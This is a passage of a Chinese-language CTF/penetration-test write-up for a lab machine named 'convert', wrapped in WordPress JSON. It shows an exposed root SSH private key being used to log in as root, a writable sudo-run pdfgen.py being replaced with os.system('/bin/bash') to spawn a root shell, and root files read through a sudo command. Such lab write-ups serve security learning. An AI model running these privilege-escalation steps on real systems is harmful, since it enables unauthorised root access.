\n6u6gCQhdpzN\/gIIkxJIBtZBrRrXaJNzly7TwWCZHKAS843nBH8S9p3lrHgYNexVFDfchwn\nVrQeNCmJV8k6zBrY1XucFAn2YLFqYbOAXqsMq7g6t4Yt1SCCfObp6HxxDJIUX3n0PQa8w7\nPyYXDfhQiaVsO3DuPnjRT0Lyj\/TuIVTQgBUysEfP1UIXiYWsMLBqHgKi842\/Q5OrQg5uia\nbE75GDEbGLeBq911Jz6s4c+j7xQUe+5twaQl15dv5wh7ZAh5v7LYOVxFVnVR3kX7KqOXmE\nfIqRif166x1e4QMTOUO0CqWwFbccMMmVG6fAez7D4jUQ\/iDtiHELD7OEhclm7iZrRp5oH3\nnGlP+l6wG2ssEpSFZI6u8FWYSJhrWcVdjURqxRWpzNnIi0oWfF2ud\/Y+1W5y\/x7qStdhYZ \nWEacCIfEQqiS2w4ZtPejTw73I\/n\/vUpW+7XueGkr\/FTWQvjyVok7ucVL4q+Ng6TVgdAAAA\nwQCgVwiOK2Rxo4KD6vyKURe0FszrpLkSicrAu6AdS3XOz4v16a0nN1leEif4lGSRIONLso\n2UEqnC3OZPKeSM+JXmm0tFYdfT1rb755BsZlySNTVh899DZJ8+OX1JC4C+vrppl\/Ue98fi \nY9sbg5f8xVGpQsOMsmnEhvU1\/o3kvI7JvLrx1wh\/OUeWrlq2VuNfCEENQxG9OKqYQKbq4c\nywcRn27InTITqaOLbtNHziefasFMzwpbxURVo+taCmJIjhSGYAAADBAO5cicgy\/Ug3XMHO \nxMyqu\/GrhkmA1fDrqMfGy+eHDe4\/PsVGHXYpCou8p4mTP9q54yK9M22vvndCuIPcGpyM6p \nL3f2UijZ1uJH3EZuhldUWPJ3aAAobKnPiv5gnxGl9Aa1JZRHImOeojB\/54aUlKB6RCL96d slqM0przBaM2HUKyqWbdK5jby1gQ8F2CuDtBNXRmPNwM\/hkZIalDHB70JkJs2FU06JPsTD\nUqN26ZJbffqBcGoqIA1LAJzPSoIfL4HQAAAMEA0VEEa4kH\/GgfDPcO2Mz2XloBGr6AJ3si \n0urQbGMYhO5hs0KxzcnOw5\/3\/W54oGK\/lQTKkzXBx8VNsfUhvKNt0Pr4KDzNtp6wbE1DjE\nxyqnjEVEgvikm+cR46awTdP93P+nH1RF8Xj4iTuHfEpZVTS8Kq3yBLpYkB\/gjZ1U4IyTr3 \nBoG62j\/8BVupXa8NNYd2Z5EOCI8n0I9mSgHbeljNePQCJ7EZJCa1K2naUFsaZNvTb+waGe\nT7JtrQ2LFUUOlTAAAADHJvb3RAY29udmVydAECAwQFBg== \n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/convert]\n\u2514\u2500$ vim root\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/convert]\n\u2514\u2500$ chmod 600 root\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/convert]\n\u2514\u2500$ ssh root@192.168.0.111 -i root\nLinux convert 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Thu Jan  1 05:30:10 1970\nroot@convert:~# pwd\n\/root\nroot@convert:~# ls -la\ntotal 24\ndrwx------  3 root root 4096 Feb 24 10:08 .\ndrwxr-xr-x 18 root root 4096 Feb 22 22:14 ..\nlrwxrwxrwx  1 root root    9 Feb 23 17:00 .bash_history -> \/dev\/null\n-rw-r--r--  1 root root  571 Apr 11  2021 .bashrc\n-rw-r--r--  1 root root  161 Jul  9  2019 .profile\n-rw-r--r--  1 root root   33 Feb 23 17:15 root.txt\ndrwx------  2 root root 4096 Feb 23 21:38 .ssh\nroot@convert:~# cat root.txt \n1cc872dad04d177e6732abbedf1e525b\nroot@convert:~# cd .ssh\/\nroot@convert:~\/.ssh# ls -la\ntotal 16\ndrwx------ 2 root root 4096 Feb 23 21:38 .\ndrwx------ 3 root root 4096 Feb 24 10:08 ..\n-rw-r--r-- 1 root root  566 Feb 23 17:01 authorized_keys\n-rw------- 1 root root 2602 Feb 23 21:38 id_rsa<\/code><\/pre>\n
28\u5e08\u5085\u63d0\u793a\uff0c\u5176\u5b9e\u53ef\u4ee5\u4e0d\u7528\u6574\u7406\u7684\u3002\u3002\u3002<\/p>\n
\"image-20240415204959328\"<\/div><\/p>\n
\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
\"image-20240415205108533\"<\/div><\/p>\n
\u725b\u903c\u3002\u3002\u3002<\/p>\n
\u7fa4\u4e3b\u5e08\u5085\u7684\u89e3\u6cd5<\/h3>\n
\u7fa4\u4e3b\u5e08\u5085\u5728\u64cd\u4f5c\u7684\u65f6\u5019\uff0c\u9009\u62e9\u7684\u662f\u738b\u70b8\u89e3\u6cd5\uff0c\u56e0\u4e3a\u6587\u4ef6\u53ef\u5199\uff0c\u7fa4\u4e3b\u5e08\u5085\u76f4\u63a5\u9009\u62e9\u4e86\u66ff\u6362pdfgen.py<\/code>\u6587\u4ef6\uff0c\u83b7\u53d6shell\uff01\uff01\uff01\uff01<\/p>\n
cd \/tmp\nvim pdfgen.py\nimport os\nos.system("\/bin\/bash")\ncd \/home\/eva\nrm pdfgen.py \ncp \/tmp\/pdfgen.py \/home\/eva\/pdfgen.py<\/code><\/pre>\n
\"image-20240415210748406\"<\/div><\/p>\n
\u5176\u4ed6\u89e3\u6cd5<\/h3>\n
\u672c\u9898\u5b9e\u9645\u4e0a\u6ca1\u6709\u8fc7\u6ee4\u6389root\u4ee5\u53caetc\u8def\u5f84\uff0c\u4e5f\u5c31\u662f\u8bf4\u6211\u4eec\u53ef\u4ee5\u76f4\u63a5\u8bfb\u53d6\u5176\u4e2d\u7684\u6587\u4ef6\uff0c\u800c\u4e0d\u5fc5\u62c5\u5fc3\u88ab\u62e6\u4f4f\uff01<\/p>\n
sudo \/usr\/bin\/python3 \/home\/eva\/pdfgen.py -U \/root\/root.txt -O \/tmp\/flag.pdf<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
convert \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 192.168.0.111 — -A Open  […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-569","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/569","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=569"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/569\/revisions"}],"predecessor-version":[{"id":710,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/569\/revisions\/710"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=569"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=569"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=569"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}